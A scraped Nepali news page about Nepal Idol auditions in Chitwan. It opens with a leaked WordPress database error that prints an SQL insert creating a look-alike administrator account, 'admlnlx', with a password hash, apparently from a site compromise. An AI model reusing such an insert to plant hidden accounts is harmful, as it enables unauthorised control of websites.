WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWGCqI8c9m7fg8ES/zlPI7dZ2IxqEj.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 05:07:52', '', 'admlnlx', 'admlnlx')
चितवन, माघ १७–
चितवनको नारायणगढमा भोली (मंगलबार) हुने ‘नेपाल आईडल’को अडिसनको तयारी पुरा भएको छ ।
नारायणगढको उच्च माध्यमिक विद्यालयमा हुने अडिसनको सम्पूर्ण तयारी भएको आयोजकले जानकारी दिएको छ । नेपाल कै सर्वाधिक ठूलो गायन प्रतिभाको खोजी ‘नेपाल आईडल’को अन्नपुूर्ण मिडिया नेटवर्कको एपी वान टेलिभिजनले आयोजना गरेको हो । नेपालका मुख्य शहरहरुमा अडिसन गर्ने क्रममा टोली चितवन आईपुगेको हो । आज दिउँसो अडिसन टोली नारायणगढ आई पुगेको हो । नेपाल आईडलको निर्णायकहरु कालीप्रसाद बास्कोटा, इन्जिरा जोशी र निहुँ बज्राचार्य यसअघि नेपालगञ्ज र बुटवलमा अडिसन भएको थियो ।

अडिसन अन्तरगत चितवनमा मंगलबार पहिलो चरणको र बुधबार सौराहामा दोस्रो चरणको अडिसन हुने एपिवान टेलिभिजनका चितवन ब्यूरो प्रमुख अनिल ढकालले जानकारी दिए । त्यसबाट छानिएकाहरुलाई काठमाण्डौँ लगिने ढकालले जनाकारी दिए । अडिसनका लागि चितनव र आसपासका जिल्लामा प्रचार–प्रसार तिव्र पारिएको आयोजकले जानकारी जानाकारी दिएको छ । सो अडिसनमा १६ वर्ष देखि ३० वर्ष उमेर समूहले आईडलमा सहभागि हुन सक्नेछन् । चितवन अडिसनमा एक हजार भन्दा बढिको सहभागि हुने अपेक्षा गरिएको छ ।
नेपाल आईडल विजेताले महिन्द्रा केयुभि कार, २० लाख नगद र १५ लाख बराबरको भिडियो एम्बम बनाउन पाउने छ ।